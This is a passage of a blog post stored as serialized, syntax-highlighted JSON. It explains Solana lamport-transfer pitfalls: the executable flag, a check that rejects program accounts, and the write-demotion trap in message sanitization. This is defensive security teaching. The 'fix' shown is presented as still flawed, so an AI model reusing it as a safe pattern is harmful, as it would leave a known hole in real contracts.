programdata_address",{"type":24,"tag":301,"props":80505,"children":80506},{"style":385},[80507],{"type":30,"value":1679},{"type":24,"tag":301,"props":80509,"children":80510},{"style":10246},[80511],{"type":30,"value":27626},{"type":24,"tag":301,"props":80513,"children":80514},{"style":359},[80515],{"type":30,"value":1729},{"type":24,"tag":301,"props":80517,"children":80518},{"class":303,"line":344},[80519],{"type":24,"tag":301,"props":80520,"children":80521},{"style":359},[80522],{"type":30,"value":80523},"},\n",{"type":24,"tag":301,"props":80525,"children":80526},{"class":303,"line":401},[80527,80532],{"type":24,"tag":301,"props":80528,"children":80529},{"style":10246},[80530],{"type":30,"value":80531},"ProgramData",{"type":24,"tag":301,"props":80533,"children":80534},{"style":359},[80535],{"type":30,"value":3035},{"type":24,"tag":301,"props":80537,"children":80538},{"class":303,"line":415},[80539],{"type":24,"tag":301,"props":80540,"children":80541},{"style":1062},[80542],{"type":30,"value":80543}," /// Slot that the program was last modified.\n",{"type":24,"tag":301,"props":80545,"children":80546},{"class":303,"line":439},[80547,80552,80556,80560],{"type":24,"tag":301,"props":80548,"children":80549},{"style":369},[80550],{"type":30,"value":80551}," slot",{"type":24,"tag":301,"props":80553,"children":80554},{"style":385},[80555],{"type":30,"value":1679},{"type":24,"tag":301,"props":80557,"children":80558},{"style":10246},[80559],{"type":30,"value":12680},{"type":24,"tag":301,"props":80561,"children":80562},{"style":359},[80563],{"type":30,"value":1729},{"type":24,"tag":301,"props":80565,"children":80566},{"class":303,"line":447},[80567],{"type":24,"tag":301,"props":80568,"children":80569},{"style":1062},[80570],{"type":30,"value":80571}," /// Address of the Program's upgrade authority.\n",{"type":24,"tag":301,"props":80573,"children":80574},{"class":303,"line":476},[80575,80580,80584,80588,80592,80596],{"type":24,"tag":301,"props":80576,"children":80577},{"style":369},[80578],{"type":30,"value":80579}," upgrade_authority_address",{"type":24,"tag":301,"props":80581,"children":80582},{"style":385},[80583],{"type":30,"value":1679},{"type":24,"tag":301,"props":80585,"children":80586},{"style":10246},[80587],{"type":30,"value":34401},{"type":24,"tag":301,"props":80589,"children":80590},{"style":359},[80591],{"type":30,"value":1849},{"type":24,"tag":301,"props":80593,"children":80594},{"style":10246},[80595],{"type":30,"value":28167},{"type":24,"tag":301,"props":80597,"children":80598},{"style":359},[80599],{"type":30,"value":12957},{"type":24,"tag":301,"props":80601,"children":80602},{"class":303,"line":495},[80603],{"type":24,"tag":301,"props":80604,"children":80605},{"style":1062},[80606],{"type":30,"value":80607}," // The raw program data follows this serialized structure in the\n",{"type":24,"tag":301,"props":80609,"children":80610},{"class":303,"line":504},[80611],{"type":24,"tag":301,"props":80612,"children":80613},{"style":1062},[80614],{"type":30,"value":80615}," // account's data.\n",{"type":24,"tag":301,"props":80617,"children":80618},{"class":303,"line":512},[80619],{"type":24,"tag":301,"props":80620,"children":80621},{"style":359},[80622],{"type":30,"value":80523},{"type":24,"tag":32,"props":80624,"children":80625},{},[80626,80628,80635],{"type":30,"value":80627},"Eventually, the executable flag will be removed entirely as proposed in ",{"type":24,"tag":188,"props":80629,"children":80632},{"href":80630,"rel":80631},"https://github.com/solana-foundation/solana-improvement-documents/blob/main/proposals/0162-remove-accounts-executable-flag-checks.md",[192],[80633],{"type":30,"value":80634},"SIMD-0162",{"type":30,"value":80636},". The reasoning is simple: an account's owner and its content are sufficient to determine if it's a valid program — the executable flag is redundant.",{"type":24,"tag":32,"props":80638,"children":80639},{},[80640,80642,80647,80649,80654],{"type":30,"value":80641},"This change is also a ",{"type":24,"tag":60,"props":80643,"children":80644},{},[80645],{"type":30,"value":80646},"hard requirement for supporting the new loader-v4",{"type":30,"value":80648},". Unlike the upgradable loader, which relies on a separate ",{"type":24,"tag":145,"props":80650,"children":80652},{"className":80651},[],[80653],{"type":30,"value":80531},{"type":30,"value":80655}," proxy account, loader-v4 stores all program data directly in the program account itself.",{"type":24,"tag":32,"props":80657,"children":80658},{},[80659,80661,80668,80670,80675],{"type":30,"value":80660},"As a result, it becomes impossible to modify the account's size after deployment, or to ",{"type":24,"tag":188,"props":80662,"children":80665},{"href":80663,"rel":80664},"https://github.com/anza-xyz/agave/blob/7a1e57469a5b1aeed617457c0519803620ba953f/programs/bpf_loader/src/lib.rs#L1411",[192],[80666],{"type":30,"value":80667},"migrate",{"type":30,"value":80669}," from the upgradable loader to loader-v4 — without hitting the ",{"type":24,"tag":145,"props":80671,"children":80673},{"className":80672},[],[80674],{"type":30,"value":80108},{"type":30,"value":80676}," restriction.",{"type":24,"tag":270,"props":80678,"children":80680},{"id":80679},"fix-2-reject-program-accounts",[80681],{"type":30,"value":80682},"Fix 2: Reject Program Accounts",{"type":24,"tag":32,"props":80684,"children":80685},{},[80686],{"type":30,"value":80687},"To avoid this footgun, let’s explicitly skip any executable account:",{"type":24,"tag":291,"props":80689,"children":80691},{"className":9818,"code":80690,"language":9817,"meta":7,"style":7},"pub fn can_transfer_lamports(account: &AccountInfo, lamports: u64) -> Result\u003Cbool> {\nfn is_program(account: &AccountInfo) -> bool {\n account.executable\n}\nlet rent = Rent::get()?;\nlet balance_after = account.lamports() + lamports;\nOk(account.is_writable\n && rent.is_exempt(balance_after, account.data_len())\n && !is_program(account))\n}\n",[80692],{"type":24,"tag":145,"props":80693,"children":80694},{"__ignoreMap":7},[80695,80771,80819,80835,80842,80881,80925,80949,80998,81026],{"type":24,"tag":301,"props":80696,"children":80697},{"class":303,"line":304},[80698,80702,80706,80711,80715,80719,80723,80727,80731,80735,80739,80743,80747,80751,80755,80759,80763,80767],{"type":24,"tag":301,"props":80699,"children":80700},{"style":348},[80701],{"type":30,"value":20484},{"type":24,"tag":301,"props":80703,"children":80704},{"style":348},[80705],{"type":30,"value":20489},{"type":24,"tag":301,"props":80707,"children":80708},{"style":314},[80709],{"type":30,"value":80710}," can_transfer_lamports",{"type":24,"tag":301,"props":80712,"children":80713},{"style":359},[80714],{"type":30,"value":362},{"type":24,"tag":301,"props":80716,"children":80717},{"style":369},[80718],{"type":30,"value":19748},{"type":24,"tag":301,"props":80720,"children":80721},{"style":385},[80722],{"type":30,"value":1679},{"type":24,"tag":301,"props":80724,"children":80725},{"style":385},[80726],{"type":30,"value":991},{"type":24,"tag":301,"props":80728,"children":80729},{"style":10246},[80730],{"type":30,"value":21729},{"type":24,"tag":301,"props":80732,"children":80733},{"style":359},[80734],{"type":30,"value":377},{"type":24,"tag":301,"props":80736,"children":80737},{"style":369},[80738],{"type":30,"value":22300},{"type":24,"tag":301,"props":80740,"children":80741},{"style":385},[80742],{"type":30,"value":1679},{"type":24,"tag":301,"props":80744,"children":80745},{"style":10246},[80746],{"type":30,"value":12680},{"type":24,"tag":301,"props":80748,"children":80749},{"style":359},[80750],{"type":30,"value":911},{"type":24,"tag":301,"props":80752,"children":80753},{"style":385},[80754],{"type":30,"value":882},{"type":24,"tag":301,"props":80756,"children":80757},{"style":10246},[80758],{"type":30,"value":20555},{"type":24,"tag":301,"props":80760,"children":80761},{"style":359},[80762],{"type":30,"value":1849},{"type":24,"tag":301,"props":80764,"children":80765},{"style":10246},[80766],{"type":30,"value":36442},{"type":24,"tag":301,"props":80768,"children":80769},{"style":359},[80770],{"type":30,"value":14097},{"type":24,"tag":301,"props":80772,"children":80773},{"class":303,"line":320},[80774,80778,80783,80787,80791,80795,80799,80803,80807,80811,80815],{"type":24,"tag":301,"props":80775,"children":80776},{"style":348},[80777],{"type":30,"value":27037},{"type":24,"tag":301,"props":80779,"children":80780},{"style":314},[80781],{"type":30,"value":80782}," is_program",{"type":24,"tag":301,"props":80784,"children":80785},{"style":359},[80786],{"type":30,"value":362},{"type":24,"tag":301,"props":80788,"children":80789},{"style":369},[80790],{"type":30,"value":19748},{"type":24,"tag":301,"props":80792,"children":80793},{"style":385},[80794],{"type":30,"value":1679},{"type":24,"tag":301,"props":80796,"children":80797},{"style":385},[80798],{"type":30,"value":991},{"type":24,"tag":301,"props":80800,"children":80801},{"style":10246},[80802],{"type":30,"value":21729},{"type":24,"tag":301,"props":80804,"children":80805},{"style":359},[80806],{"type":30,"value":911},{"type":24,"tag":301,"props":80808,"children":80809},{"style":385},[80810],{"type":30,"value":882},{"type":24,"tag":301,"props":80812,"children":80813},{"style":10246},[80814],{"type":30,"value":18848},{"type":24,"tag":301,"props":80816,"children":80817},{"style":359},[80818],{"type":30,"value":3035},{"type":24,"tag":301,"props":80820,"children":80821},{"class":303,"line":335},[80822,80826,80830],{"type":24,"tag":301,"props":80823,"children":80824},{"style":369},[80825],{"type":30,"value":31927},{"type":24,"tag":301,"props":80827,"children":80828},{"style":385},[80829],{"type":30,"value":206},{"type":24,"tag":301,"props":80831,"children":80832},{"style":359},[80833],{"type":30,"value":80834},"executable\n",{"type":24,"tag":301,"props":80836,"children":80837},{"class":303,"line":344},[80838],{"type":24,"tag":301,"props":80839,"children":80840},{"style":359},[80841],{"type":30,"value":698},{"type":24,"tag":301,"props":80843,"children":80844},{"class":303,"line":401},[80845,80849,80853,80857,80861,80865,80869,80873,80877],{"type":24,"tag":301,"props":80846,"children":80847},{"style":348},[80848],{"type":30,"value":3258},{"type":24,"tag":301,"props":80850,"children":80851},{"style":369},[80852],{"type":30,"value":79603},{"type":24,"tag":301,"props":80854,"children":80855},{"style":385},[80856],{"type":30,"value":2537},{"type":24,"tag":301,"props":80858,"children":80859},{"style":10246},[80860],{"type":30,"value":50208},{"type":24,"tag":301,"props":80862,"children":80863},{"style":385},[80864],{"type":30,"value":10308},{"type":24,"tag":301,"props":80866,"children":80867},{"style":314},[80868],{"type":30,"value":23138},{"type":24,"tag":301,"props":80870,"children":80871},{"style":359},[80872],{"type":30,"value":20672},{"type":24,"tag":301,"props":80874,"children":80875},{"style":385},[80876],{"type":30,"value":2003},{"type":24,"tag":301,"props":80878,"children":80879},{"style":359},[80880],{"type":30,"value":492},{"type":24,"tag":301,"props":80882,"children":80883},{"class":303,"line":415},[80884,80888,80893,80897,80901,80905,80909,80913,80917,80921],{"type":24,"tag":301,"props":80885,"children":80886},{"style":348},[80887],{"type":30,"value":3258},{"type":24,"tag":301,"props":80889,"children":80890},{"style":369},[80891],{"type":30,"value":80892}," balance_after",{"type":24,"tag":301,"props":80894,"children":80895},{"style":385},[80896],{"type":30,"value":2537},{"type":24,"tag":301,"props":80898,"children":80899},{"style":369},[80900],{"type":30,"value":12303},{"type":24,"tag":301,"props":80902,"children":80903},{"style":385},[80904],{"type":30,"value":206},{"type":24,"tag":301,"props":80906,"children":80907},{"style":314},[80908],{"type":30,"value":22300},{"type":24,"tag":301,"props":80910,"children":80911},{"style":359},[80912],{"type":30,"value":20835},{"type":24,"tag":301,"props":80914,"children":80915},{"style":385},[80916],{"type":30,"value":11206},{"type":24,"tag":301,"props":80918,"children":80919},{"style":369},[80920],{"type":30,"value":79913},{"type":24,"tag":301,"props":80922,"children":80923},{"style":359},[80924],{"type":30,"value":492},{"type":24,"tag":301,"props":80926,"children":80927},{"class":303,"line":439},[80928,80932,80936,80940,80944],{"type":24,"tag":301,"props":80929,"children":80930},{"style":10246},[80931],{"type":30,"value":27260},{"type":24,"tag":301,"props":80933,"children":80934},{"style":359},[80935],{"type":30,"value":362},{"type":24,"tag":301,"props":80937,"children":80938},{"style":369},[80939],{"type":30,"value":19748},{"type":24,"tag":301,"props":80941,"children":80942},{"style":385},[80943],{"type":30,"value":206},{"type":24,"tag":301,"props":80945,"children":80946},{"style":359},[80947],{"type":30,"value":80948},"is_writable\n",{"type":24,"tag":301,"props":80950,"children":80951},{"class":303,"line":447},[80952,80956,80960,80964,80969,80973,80978,80982,80986,80990,80994],{"type":24,"tag":301,"props":80953,"children":80954},{"style":385},[80955],{"type":30,"value":22410},{"type":24,"tag":301,"props":80957,"children":80958},{"style":369},[80959],{"type":30,"value":79603},{"type":24,"tag":301,"props":80961,"children":80962},{"style":385},[80963],{"type":30,"value":206},{"type":24,"tag":301,"props":80965,"children":80966},{"style":314},[80967],{"type":30,"value":80968},"is_exempt",{"type":24,"tag":301,"props":80970,"children":80971},{"style":359},[80972],{"type":30,"value":362},{"type":24,"tag":301,"props":80974,"children":80975},{"style":369},[80976],{"type":30,"value":80977},"balance_after",{"type":24,"tag":301,"props":80979,"children":80980},{"style":359},[80981],{"type":30,"value":377},{"type":24,"tag":301,"props":80983,"children":80984},{"style":369},[80985],{"type":30,"value":19748},{"type":24,"tag":301,"props":80987,"children":80988},{"style":385},[80989],{"type":30,"value":206},{"type":24,"tag":301,"props":80991,"children":80992},{"style":314},[80993],{"type":30,"value":20599},{"type":24,"tag":301,"props":80995,"children":80996},{"style":359},[80997],{"type":30,"value":22449},{"type":24,"tag":301,"props":80999,"children":81000},{"class":303,"line":476},[81001,81005,81009,81014,81018,81022],{"type":24,"tag":301,"props":81002,"children":81003},{"style":385},[81004],{"type":30,"value":22410},{"type":24,"tag":301,"props":81006,"children":81007},{"style":385},[81008],{"type":30,"value":19659},{"type":24,"tag":301,"props":81010,"children":81011},{"style":314},[81012],{"type":30,"value":81013},"is_program",{"type":24,"tag":301,"props":81015,"children":81016},{"style":359},[81017],{"type":30,"value":362},{"type":24,"tag":301,"props":81019,"children":81020},{"style":369},[81021],{"type":30,"value":19748},{"type":24,"tag":301,"props":81023,"children":81024},{"style":359},[81025],{"type":30,"value":9381},{"type":24,"tag":301,"props":81027,"children":81028},{"class":303,"line":495},[81029],{"type":24,"tag":301,"props":81030,"children":81031},{"style":359},[81032],{"type":30,"value":698},{"type":24,"tag":32,"props":81034,"children":81035},{},[81036],{"type":30,"value":81037},"Now we’re safe...right?",{"type":24,"tag":80,"props":81039,"children":81041},{"id":81040},"bug-3-the-write-demotion-trap",[81042],{"type":30,"value":81043},"Bug 3: The Write-Demotion Trap",{"type":24,"tag":32,"props":81045,"children":81046},{},[81047,81049,81054,81056,81061],{"type":30,"value":81048},"On Solana, accounts passed as ",{"type":24,"tag":60,"props":81050,"children":81051},{},[81052],{"type":30,"value":81053},"writable",{"type":30,"value":81055}," in a transaction can be ",{"type":24,"tag":60,"props":81057,"children":81058},{},[81059],{"type":30,"value":81060},"silently downgraded to read-only",{"type":30,"value":81062},". This behavior occurs during message sanitization — even before your program runs.",{"type":24,"tag":32,"props":81064,"children":81065},{},[81066,81068,81075],{"type":30,"value":81067},"Let’s walk through the logic for legacy messages (note: the same rules apply to ",{"type":24,"tag":188,"props":81069,"children":81072},{"href":81070,"rel":81071},"https://github.com/anza-xyz/solana-sdk/blob/master/message/src/versions/v0/loaded.rs#L58-L98",[192],[81073],{"type":30,"value":81074},"MessageV0",{"type":30,"value":81076},", but legacy is simpler to follow):",{"type":24,"tag":291,"props":81078,"children":81080},{"className":9818,"code":81079,"language":9817,"meta":7,"style":7},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/sanitized.rs#L39-L55\nimpl LegacyMessage\u003C'_> {\n pub fn new(message: legacy::Message, reserved_account_keys: &HashSet\u003CPubkey>) -> Self {\n let is_writable_account_cache = message\n .account_keys\n .iter()\n .enumerate()\n .map(|(i, _key)| {\n message.is_writable_index(i)\n && !reserved_account_keys.contains(&message.account_keys[i])\n && !message.demote_program_id(i)\n })\n .collect::\u003CVec\u003C_>>();\n Self {\n message: Cow::Owned(message),\n is_writable_account_cache,\n }\n }\n}\n\n// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/legacy.rs#L642-L644\npub fn demote_program_id(&self, i: usize) -> bool {\n self.is_key_called_as_program(i) && !self.is_upgradeable_loader_present()\n}\n\n",[81081],{"type":24,"tag":145,"props":81082,"children":81083},{"__ignoreMap":7},[81084,81092,81116,81204,81225,81237,81253,81269,81317,81346,81400,81436,81444,81481,81493,81531,81543,81550,81557,81564,81571,81579,81639,81692],{"type":24,"tag":301,"props":81085,"children":81086},{"class":303,"line":304},[81087],{"type":24,"tag":301,"props":81088,"children":81089},{"style":1062},[81090],{"type":30,"value":81091},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/sanitized.rs#L39-L55\n",{"type":24,"tag":301,"props":81093,"children":81094},{"class":303,"line":320},[81095,81099,81104,81108,81112],{"type":24,"tag":301,"props":81096,"children":81097},{"style":348},[81098],{"type":30,"value":34950},{"type":24,"tag":301,"props":81100,"children":81101},{"style":10246},[81102],{"type":30,"value":81103}," LegacyMessage",{"type":24,"tag":301,"props":81105,"children":81106},{"style":359},[81107],{"type":30,"value":29690},{"type":24,"tag":301,"props":81109,"children":81110},{"style":10246},[81111],{"type":30,"value":9918},{"type":24,"tag":301,"props":81113,"children":81114},{"style":359},[81115],{"type":30,"value":14097},{"type":24,"tag":301,"props":81117,"children":81118},{"class":303,"line":335},[81119,81123,81127,81131,81135,81139,81143,81148,81152,81157,81161,81166,81170,81174,81179,81183,81187,81191,81195,81200],{"type":24,"tag":301,"props":81120,"children":81121},{"style":348},[81122],{"type":30,"value":27612},{"type":24,"tag":301,"props":81124,"children":81125},{"style":348},[81126],{"type":30,"value":20489},{"type":24,"tag":301,"props":81128,"children":81129},{"style":314},[81130],{"type":30,"value":38685},{"type":24,"tag":301,"props":81132,"children":81133},{"style":359},[81134],{"type":30,"value":362},{"type":24,"tag":301,"props":81136,"children":81137},{"style":369},[81138],{"type":30,"value":74749},{"type":24,"tag":301,"props":81140,"children":81141},{"style":385},[81142],{"type":30,"value":1679},{"type":24,"tag":301,"props":81144,"children":81145},{"style":359},[81146],{"type":30,"value":81147}," legacy",{"type":24,"tag":301,"props":81149,"children":81150},{"style":385},[81151],{"type":30,"value":10308},{"type":24,"tag":301,"props":81153,"children":81154},{"style":10246},[81155],{"type":30,"value":81156},"Message",{"type":24,"tag":301,"props":81158,"children":81159},{"style":359},[81160],{"type":30,"value":377},{"type":24,"tag":301,"props":81162,"children":81163},{"style":369},[81164],{"type":30,"value":81165},"reserved_account_keys",{"type":24,"tag":301,"props":81167,"children":81168},{"style":385},[81169],{"type":30,"value":1679},{"type":24,"tag":301,"props":81171,"children":81172},{"style":385},[81173],{"type":30,"value":991},{"type":24,"tag":301,"props":81175,"children":81176},{"style":10246},[81177],{"type":30,"value":81178},"HashSet",{"type":24,"tag":301,"props":81180,"children":81181},{"style":359},[81182],{"type":30,"value":1849},{"type":24,"tag":301,"props":81184,"children":81185},{"style":10246},[81186],{"type":30,"value":28167},{"type":24,"tag":301,"props":81188,"children":81189},{"style":359},[81190],{"type":30,"value":27217},{"type":24,"tag":301,"props":81192,"children":81193},{"style":385},[81194],{"type":30,"value":882},{"type":24,"tag":301,"props":81196,"children":81197},{"style":348},[81198],{"type":30,"value":81199}," Self",{"type":24,"tag":301,"props":81201,"children":81202},{"style":359},[81203],{"type":30,"value":3035},{"type":24,"tag":301,"props":81205,"children":81206},{"class":303,"line":344},[81207,81211,81216,81220],{"type":24,"tag":301,"props":81208,"children":81209},{"style":348},[81210],{"type":30,"value":9900},{"type":24,"tag":301,"props":81212,"children":81213},{"style":369},[81214],{"type":30,"value":81215}," is_writable_account_cache",{"type":24,"tag":301,"props":81217,"children":81218},{"style":385},[81219],{"type":30,"value":2537},{"type":24,"tag":301,"props":81221,"children":81222},{"style":369},[81223],{"type":30,"value":81224}," message\n",{"type":24,"tag":301,"props":81226,"children":81227},{"class":303,"line":401},[81228,81232],{"type":24,"tag":301,"props":81229,"children":81230},{"style":385},[81231],{"type":30,"value":9999},{"type":24,"tag":301,"props":81233,"children":81234},{"style":359},[81235],{"type":30,"value":81236},"account_keys\n",{"type":24,"tag":301,"props":81238,"children":81239},{"class":303,"line":415},[81240,81244,81249],{"type":24,"tag":301,"props":81241,"children":81242},{"style":385},[81243],{"type":30,"value":9999},{"type":24,"tag":301,"props":81245,"children":81246},{"style":314},[81247],{"type":30,"value":81248},"iter",{"type":24,"tag":301,"props":81250,"children":81251},{"style":359},[81252],{"type":30,"value":14551},{"type":24,"tag":301,"props":81254,"children":81255},{"class":303,"line":439},[81256,81260,81265],{"type":24,"tag":301,"props":81257,"children":81258},{"style":385},[81259],{"type":30,"value":9999},{"type":24,"tag":301,"props":81261,"children":81262},{"style":314},[81263],{"type":30,"value":81264},"enumerate",{"type":24,"tag":301,"props":81266,"children":81267},{"style":359},[81268],{"type":30,"value":14551},{"type":24,"tag":301,"props":81270,"children":81271},{"class":303,"line":447},[81272,81276,81280,81284,81288,81292,81296,81300,81305,81309,81313],{"type":24,"tag":301,"props":81273,"children":81274},{"style":385},[81275],{"type":30,"value":9999},{"type":24,"tag":301,"props":81277,"children":81278},{"style":314},[81279],{"type":30,"value":73814},{"type":24,"tag":301,"props":81281,"children":81282},{"style":359},[81283],{"type":30,"value":362},{"type":24,"tag":301,"props":81285,"children":81286},{"style":385},[81287],{"type":30,"value":17220},{"type":24,"tag":301,"props":81289,"children":81290},{"style":359},[81291],{"type":30,"value":362},{"type":24,"tag":301,"props":81293,"children":81294},{"style":369},[81295],{"type":30,"value":10564},{"type":24,"tag":301,"props":81297,"children":81298},{"style":359},[81299],{"type":30,"value":377},{"type":24,"tag":301,"props":81301,"children":81302},{"style":369},[81303],{"type":30,"value":81304},"_key",{"type":24,"tag":301,"props":81306,"children":81307},{"style":359},[81308],{"type":30,"value":9961},{"type":24,"tag":301,"props":81310,"children":81311},{"style":385},[81312],{"type":30,"value":17220},{"type":24,"tag":301,"props":81314,"children":81315},{"style":359},[81316],{"type":30,"value":3035},{"type":24,"tag":301,"props":81318,"children":81319},{"class":303,"line":476},[81320,81325,81329,81334,81338,81342],{"type":24,"tag":301,"props":81321,"children":81322},{"style":369},[81323],{"type":30,"value":81324}," message",{"type":24,"tag":301,"props":81326,"children":81327},{"style":385},[81328],{"type":30,"value":206},{"type":24,"tag":301,"props":81330,"children":81331},{"style":314},[81332],{"type":30,"value":81333},"is_writable_index",{"type":24,"tag":301,"props":81335,"children":81336},{"style":359},[81337],{"type":30,"value":362},{"type":24,"tag":301,"props":81339,"children":81340},{"style":369},[81341],{"type":30,"value":10564},{"type":24,"tag":301,"props":81343,"children":81344},{"style":359},[81345],{"type":30,"value":791},{"type":24,"tag":301,"props":81347,"children":81348},{"class":303,"line":495},[81349,81354,81358,81362,81366,81371,81375,81379,81383,81387,81392,81396],{"type":24,"tag":301,"props":81350,"children":81351},{"style":385},[81352],{"type":30,"value":81353}," &&",{"type":24,"tag":301,"props":81355,"children":81356},{"style":385},[81357],{"type":30,"value":19659},{"type":24,"tag":301,"props":81359,"children":81360},{"style":369},[81361],{"type":30,"value":81165},{"type":24,"tag":301,"props":81363,"children":81364},{"style":385},[81365],{"type":30,"value":206},{"type":24,"tag":301,"props":81367,"children":81368},{"style":314},[81369],{"type":30,"value":81370},"contains",{"type":24,"tag":301,"props":81372,"children":81373},{"style":359},[81374],{"type":30,"value":362},{"type":24,"tag":301,"props":81376,"children":81377},{"style":385},[81378],{"type":30,"value":556},{"type":24,"tag":301,"props":81380,"children":81381},{"style":369},[81382],{"type":30,"value":74749},{"type":24,"tag":301,"props":81384,"children":81385},{"style":385},[81386],{"type":30,"value":206},{"type":24,"tag":301,"props":81388,"children":81389},{"style":359},[81390],{"type":30,"value":81391},"account_keys[",{"type":24,"tag":301,"props":81393,"children":81394},{"style":369},[81395],{"type":30,"value":10564},{"type":24,"tag":301,"props":81397,"children":81398},{"style":359},[81399],{"type":30,"value":62163},{"type":24,"tag":301,"props":81401,"children":81402},{"class":303,"line":504},[81403,81407,81411,81415,81419,81424,81428,81432],{"type":24,"tag":301,"props":81404,"children":81405},{"style":385},[81406],{"type":30,"value":81353},{"type":24,"tag":301,"props":81408,"children":81409},{"style":385},[81410],{"type":30,"value":19659},{"type":24,"tag":301,"props":81412,"children":81413},{"style":369},[81414],{"type":30,"value":74749},{"type":24,"tag":301,"props":81416,"children":81417},{"style":385},[81418],{"type":30,"value":206},{"type":24,"tag":301,"props":81420,"children":81421},{"style":314},[81422],{"type":30,"value":81423},"demote_program_id",{"type":24,"tag":301,"props":81425,"children":81426},{"style":359},[81427],{"type":30,"value":362},{"type":24,"tag":301,"props":81429,"children":81430},{"style":369},[81431],{"type":30,"value":10564},{"type":24,"tag":301,"props":81433,"children":81434},{"style":359},[81435],{"type":30,"value":791},{"type":24,"tag":301,"props":81437,"children":81438},{"class":303,"line":512},[81439],{"type":24,"tag":301,"props":81440,"children":81441},{"style":359},[81442],{"type":30,"value":81443}," })\n",{"type":24,"tag":301,"props":81445,"children":81446},{"class":303,"line":592},[81447,81451,81456,81460,81464,81468,81472,81476],{"type":24,"tag":301,"props":81448,"children":81449},{"style":385},[81450],{"type":30,"value":9999},{"type":24,"tag":301,"props":81452,"children":81453},{"style":314},[81454],{"type":30,"value":81455},"collect",{"type":24,"tag":301,"props":81457,"children":81458},{"style":385},[81459],{"type":30,"value":10308},{"type":24,"tag":301,"props":81461,"children":81462},{"style":359},[81463],{"type":30,"value":1849},{"type":24,"tag":301,"props":81465,"children":81466},{"style":10246},[81467],{"type":30,"value":23991},{"type":24,"tag":301,"props":81469,"children":81470},{"style":359},[81471],{"type":30,"value":1849},{"type":24,"tag":301,"props":81473,"children":81474},{"style":369},[81475],{"type":30,"value":9918},{"type":24,"tag":301,"props":81477,"children":81478},{"style":359},[81479],{"type":30,"value":81480},">>();\n",{"type":24,"tag":301,"props":81482,"children":81483},{"class":303,"line":619},[81484,81489],{"type":24,"tag":301,"props":81485,"children":81486},{"style":348},[81487],{"type":30,"value":81488}," Self",{"type":24,"tag":301,"props":81490,"children":81491},{"style":359},[81492],{"type":30,"value":3035},{"type":24,"tag":301,"props":81494,"children":81495},{"class":303,"line":635},[81496,81501,81505,81510,81514,81519,81523,81527],{"type":24,"tag":301,"props":81497,"children":81498},{"style":369},[81499],{"type":30,"value":81500}," message",{"type":24,"tag":301,"props":81502,"children":81503},{"style":385},[81504],{"type":30,"value":1679},{"type":24,"tag":301,"props":81506,"children":81507},{"style":10246},[81508],{"type":30,"value":81509}," Cow",{"type":24,"tag":301,"props":81511,"children":81512},{"style":385},[81513],{"type":30,"value":10308},{"type":24,"tag":301,"props":81515,"children":81516},{"style":314},[81517],{"type":30,"value":81518},"Owned",{"type":24,"tag":301,"props":81520,"children":81521},{"style":359},[81522],{"type":30,"value":362},{"type":24,"tag":301,"props":81524,"children":81525},{"style":369},[81526],{"type":30,"value":74749},{"type":24,"tag":301,"props":81528,"children":81529},{"style":359},[81530],{"type":30,"value":4656},{"type":24,"tag":301,"props":81532,"children":81533},{"class":303,"line":643},[81534,81539],{"type":24,"tag":301,"props":81535,"children":81536},{"style":369},[81537],{"type":30,"value":81538}," is_writable_account_cache",{"type":24,"tag":301,"props":81540,"children":81541},{"style":359},[81542],{"type":30,"value":1729},{"type":24,"tag":301,"props":81544,"children":81545},{"class":303,"line":652},[81546],{"type":24,"tag":301,"props":81547,"children":81548},{"style":359},[81549],{"type":30,"value":3345},{"type":24,"tag":301,"props":81551,"children":81552},{"class":303,"line":666},[81553],{"type":24,"tag":301,"props":81554,"children":81555},{"style":359},[81556],{"type":30,"value":501},{"type":24,"tag":301,"props":81558,"children":81559},{"class":303,"line":674},[81560],{"type":24,"tag":301,"props":81561,"children":81562},{"style":359},[81563],{"type":30,"value":698},{"type":24,"tag":301,"props":81565,"children":81566},{"class":303,"line":692},[81567],{"type":24,"tag":301,"props":81568,"children":81569},{"emptyLinePlaceholder":16},[81570],{"type":30,"value":341},{"type":24,"tag":301,"props":81572,"children":81573},{"class":303,"line":3631},[81574],{"type":24,"tag":301,"props":81575,"children":81576},{"style":1062},[81577],{"type":30,"value":81578},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/legacy.rs#L642-L644\n",{"type":24,"tag":301,"props":81580,"children":81581},{"class":303,"line":3639},[81582,81586,81590,81595,81599,81603,81607,81611,81615,81619,81623,81627,81631,81635],{"type":24,"tag":301,"props":81583,"children":81584},{"style":348},[81585],{"type":30,"value":20484},{"type":24,"tag":301,"props":81587,"children":81588},{"style":348},[81589],{"type":30,"value":20489},{"type":24,"tag":301,"props":81591,"children":81592},{"style":314},[81593],{"type":30,"value":81594}," demote_program_id",{"type":24,"tag":301,"props":81596,"children":81597},{"style":359},[81598],{"type":30,"value":362},{"type":24,"tag":301,"props":81600,"children":81601},{"style":385},[81602],{"type":30,"value":556},{"type":24,"tag":301,"props":81604,"children":81605},{"style":348},[81606],{"type":30,"value":20507},{"type":24,"tag":301,"props":81608,"children":81609},{"style":359},[81610],{"type":30,"value":377},{"type":24,"tag":301,"props":81612,"children":81613},{"style":369},[81614],{"type":30,"value":10564},{"type":24,"tag":301,"props":81616,"children":81617},{"style":385},[81618],{"type":30,"value":1679},{"type":24,"tag":301,"props":81620,"children":81621},{"style":10246},[81622],{"type":30,"value":20525},{"type":24,"tag":301,"props":81624,"children":81625},{"style":359},[81626],{"type":30,"value":911},{"type":24,"tag":301,"props":81628,"children":81629},{"style":385},[81630],{"type":30,"value":882},{"type":24,"tag":301,"props":81632,"children":81633},{"style":10246},[81634],{"type":30,"value":18848},{"type":24,"tag":301,"props":81636,"children":81637},{"style":359},[81638],{"type":30,"value":3035},{"type":24,"tag":301,"props":81640,"children":81641},{"class":303,"line":3647},[81642,81646,81650,81655,81659,81663,81667,81671,81675,81679,81683,81688],{"type":24,"tag":301,"props":81643,"children":81644},{"style":348},[81645],{"type":30,"value":27555},{"type":24,"tag":301,"props":81647,"children":81648},{"style":385},[81649],{"type":30,"value":206},{"type":24,"tag":301,"props":81651,"children":81652},{"style":314},[81653],{"type":30,"value":81654},"is_key_called_as_program",{"type":24,"tag":301,"props":81656,"children":81657},{"style":359},[81658],{"type":30,"value":362},{"type":24,"tag":301,"props":81660,"children":81661},{"style":369},[81662],{"type":30,"value":10564},{"type":24,"tag":301,"props":81664,"children":81665},{"style":359},[81666],{"type":30,"value":911},{"type":24,"tag":301,"props":81668,"children":81669},{"style":385},[81670],{"type":30,"value":5639},{"type":24,"tag":301,"props":81672,